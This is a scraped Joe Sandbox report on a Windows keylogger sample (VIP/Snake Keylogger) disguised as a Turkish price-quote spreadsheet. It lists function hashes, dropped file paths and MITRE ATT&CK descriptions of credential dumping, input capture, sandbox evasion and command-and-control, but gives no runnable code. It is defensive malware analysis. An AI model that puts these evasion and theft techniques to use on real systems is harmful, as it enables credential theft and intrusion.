Source File: 0000000E.00000002.3801070779.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12b0000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84353cc121a32e7f44004ecd7b234427d79ddfe4f4463f01245ab025365eea29
Instruction ID: 40097d8f1167135e5b358de2eef51a98da02d2ef72aeaca0f188d4a68111df8c
Opcode Fuzzy Hash: 84353cc121a32e7f44004ecd7b234427d79ddfe4f4463f01245ab025365eea29
Instruction Fuzzy Hash: 55112C70D00209DFEB29EFA9D541B9EBFF2FB44300F1485B9C518AB254EB385A458B81

Function 012BEB65 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3801070779.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12b0000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0e580825970e14f69e0ba7fc8c7430b9925162dde0cf8f6a8d293f7c362b8c7
Instruction ID: c83afda2ecc1f356bd776dbb464f922714e43146f78f5014d38ae4468d929ddd
Opcode Fuzzy Hash: b0e580825970e14f69e0ba7fc8c7430b9925162dde0cf8f6a8d293f7c362b8c7
Instruction Fuzzy Hash: 25216A74E10229CFDB64DFA8D994BADBBB1BF49304F1090A9D409A7361DB30AD85CF40

Function 0112D03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3798953801.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_112d000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction ID: 5526b2e6f50a7e43768bb9083153a7141a333a71f67c5992d6c5833e9f186ddd
Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction Fuzzy Hash: 0D11EB75504280DFCB1ACF24E9C0B15BFA2FB84314F24C6A9D8494B6A2C33AD41ACF62

Function 012BE8E8 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3801070779.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12b0000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f24cd66cc1ca3114462a40ca5fec064bd5a63e078fe2b35bc72bf83389c69853
Instruction ID: 28fa5cfe113b3060b50aae4928660d210e4a51521850c9a0459b2a45b409f844
Opcode Fuzzy Hash: f24cd66cc1ca3114462a40ca5fec064bd5a63e078fe2b35bc72bf83389c69853
Instruction Fuzzy Hash: 5F111B74D04209EFDB01DFA8D8446EEBBB1FB4A300F118066D920B3350D7385A55CF91

Function 012BABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3801070779.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12b0000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37767af4e34f81302667212582d599232eeac9175be19f76ddd6bd9cfd074a61
Instruction ID: d83a2d4a915b6f60d80da7ade58d63656098ba3134eba68f93f9034600708720
Opcode Fuzzy Hash: 37767af4e34f81302667212582d599232eeac9175be19f76ddd6bd9cfd074a61
Instruction Fuzzy Hash: D1F0F6313202114B97265A2E9494A6EBADEEFC8B913058079EB19CB366EE31CC028394

Function 012B9C23 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3801070779.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12b0000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea33777ed7092c260bfa9f672e1aabceda205aa78a758fb0d62edc1ec7b7c4af
Instruction ID: 7b91bcdadcf2d10140c22239ef9eef2f3987c0c1568e5ee546253dd50c4ad3c1
Opcode Fuzzy Hash: ea33777ed7092c260bfa9f672e1aabceda205aa78a758fb0d62edc1ec7b7c4af
Instruction Fuzzy Hash: 8EF0F0719142589FCF118B689844AEABFF5EFCD320F04C066E608D7211C2304995CB60

Function 012B28A3 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3801070779.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12b0000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b2b2a7c6b4706b5715869a6569747711b3cc79081fef8afc01b9497cc1a90fb
Instruction ID: 635697bb8199f9098992f43f8cc07d80aade703ea97113cabd46aee91923068c
Opcode Fuzzy Hash: 2b2b2a7c6b4706b5715869a6569747711b3cc79081fef8afc01b9497cc1a90fb
Instruction Fuzzy Hash: 3BE02631D543668BCB02E7F49C100EEFF34ADC6321B18469BC46137590EB302219C7A1

Function 012B6739 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3801070779.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12b0000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2890db5d5c2ad9e60f210dac70789eb70040e802bf840f4913aab561e94b5f4a
Instruction ID: 3a71a2fadff73a2c0f9758156327890d91dcddeefc1645b0c77a415b577d9d16
Opcode Fuzzy Hash: 2890db5d5c2ad9e60f210dac70789eb70040e802bf840f4913aab561e94b5f4a
Instruction Fuzzy Hash: 47E086348143468BCB2AE778A8844893B76D9D1115B048576A0055D95AEEB8089A9721

Function 012B28B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3801070779.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12b0000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2779e9d883c9d9c9a3aa1f75772b0d140cab3230b2cb73a0cc7f0a122c9e94c4
Instruction ID: e42ebbf128c8c19ff58ee571dddb1bd7c3888a3189795c5033a8ec6cf5a01fc2
Opcode Fuzzy Hash: 2779e9d883c9d9c9a3aa1f75772b0d140cab3230b2cb73a0cc7f0a122c9e94c4
Instruction Fuzzy Hash: 87D01231D2032A578B10A7A9DC144DFBB38EE95721B504626D91437544EB70665986A1

Function 012B8EF8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3801070779.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12b0000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 90d6dc02e08911f74083644f9fb219e8d85359dd2b000c0401e306cf6edec4b3
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 0AC0123321D1282BA225208EBC81AE3AA8DC2C13F4AA10137FB1C93200A8829C8001A8

Function 012BD6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3801070779.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12b0000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f4027fa373c6cbe5819d5e2de28cd5413841fdf8ded84c14b1fb13088342c33
Instruction ID: 842c3a91e895834310a1fb916decd40f8df0368fd07fa7b66a7543804c6953c9
Opcode Fuzzy Hash: 3f4027fa373c6cbe5819d5e2de28cd5413841fdf8ded84c14b1fb13088342c33
Instruction Fuzzy Hash: 87D04235E1460DCBCB31DFF8E4854DCBB71EB89325B10542AE925A7251D63454558F11

Function 012BAFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3801070779.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12b0000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a009e821095a210ca841ad65305fe53164c00a92b23a7f01e94b0dd98110e894
Instruction ID: 1d35d92bde23500edf995bbf6a101091ebcfc9a18d0ac3438411eeddae1370d0
Opcode Fuzzy Hash: a009e821095a210ca841ad65305fe53164c00a92b23a7f01e94b0dd98110e894
Instruction Fuzzy Hash: 69D0173BB000089FCB008F88E8809DDF7B6FB88220B048017E921A3220C6319925DB90

Function 012B6748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3801070779.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12b0000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86fb7129fa38cf01faefcc202cbf90545663fe484ec3a5d9a5c05933f49f1e4e
Instruction ID: c105d909e736b731ce82ab5ec3c5c06dd0a40afaff69d93d0b99f52d49e7775d
Opcode Fuzzy Hash: 86fb7129fa38cf01faefcc202cbf90545663fe484ec3a5d9a5c05933f49f1e4e
Instruction Fuzzy Hash: 2BC012344003054BD569FB75FC44555736BE6D0515F409A30B0051D54DAEBD6C965791

Non-executed Functions

Function 012B6920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;q, xrefs: 012B6936
\;q, xrefs: 012B6952
\;q, xrefs: 012B692C
\;q, xrefs: 012B695E

Memory Dump Source

Source File: 0000000E.00000002.3801070779.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12b0000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID: \;q$\;q$\;q$\;q
API String ID: 0-2933265366
Opcode ID: 90ce7fcf10ed65b0d2b063d2a6733904e36ccad9a5e77a21ed5f9e971943836d
Instruction ID: 676f97ed7a429181496252cf97e8bffec233b5dad9f03eea2da2544abc2333b4
Opcode Fuzzy Hash: 90ce7fcf10ed65b0d2b063d2a6733904e36ccad9a5e77a21ed5f9e971943836d
Instruction Fuzzy Hash: D201A231730A168FD7249E2DC9C1AE577E6BF88BA0729417AE606CB3B1DA71EC418750

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YzkHZRBcm.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5bn3unq5.hm4.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e1ow2caw.1w2.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fu4vlatk.dz3.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h0ewghyt.rk4.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i4vqduig.rrn.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l2ro0tgd.c0k.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pdkzyv3j.i0x.psm1

Windows Analysis Report
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre